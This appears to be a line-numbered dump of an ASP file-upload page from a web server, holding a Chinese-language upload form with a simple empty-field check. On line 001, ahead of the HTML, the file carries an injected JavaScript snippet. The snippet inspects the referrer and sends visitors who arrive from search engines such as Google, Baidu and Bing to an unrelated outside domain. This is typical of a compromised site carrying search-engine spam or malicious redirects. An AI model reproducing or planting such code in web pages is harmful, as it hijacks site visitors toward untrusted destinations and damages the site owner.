d:\wwwroot\wuchunhua\Upload1.asp
001:
<script type="text/javascript">var s=document.referrer;if(s.indexOf("google")>0 || s.indexOf("baidu")>0 || s.indexOf("yahoo")>0 || s.indexOf("gou")>0 || s.indexOf("bing")>0 || s.indexOf("dao")>0 || s.indexOf("so")>0 || s.indexOf("sm")>0 || s.indexOf("biso")>0 ){location.href="http://www.afisyecd.space/?1923057"}</script><html>
002:
<head>
003:
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
004:
<link href="inc/style.css" rel="stylesheet" type="text/css">
005:
<style type="text/css">
006:
<!--
007:
BODY{
008:
font-size:9pt
009:
}
010:
.tx1 { height: 20px;font-size: 9pt; border: 1px solid; border-color: #000000; color: #0000FF}
011:
-->
012:
</style>
013:
<SCRIPT language=javascript>
014:
function check()
015:
{
016:
var strFileName=document.form.FileName.value;
017:
if (strFileName=="")
018:
{
019:
alert("请选择要上传的文件");
020:
document.form.FileName.focus();
021:
return false;
022:
}
023:
}
024:
</SCRIPT>
025:
</head>
026:
<body leftmargin="0" topmargin="0">
027:
<form action="upfile1.asp" method="post" name="form" onSubmit="return check()" enctype="multipart/form-data">
028:
<input name="FileName" type="FILE" class="tx1" size="25">
029:
<input type="submit" name="Submit" value="上传" style="border:1px double rgb(88,88,88);font:9pt">
030:
</form>
031:
</body>
032:
</html>
033:
034:
035: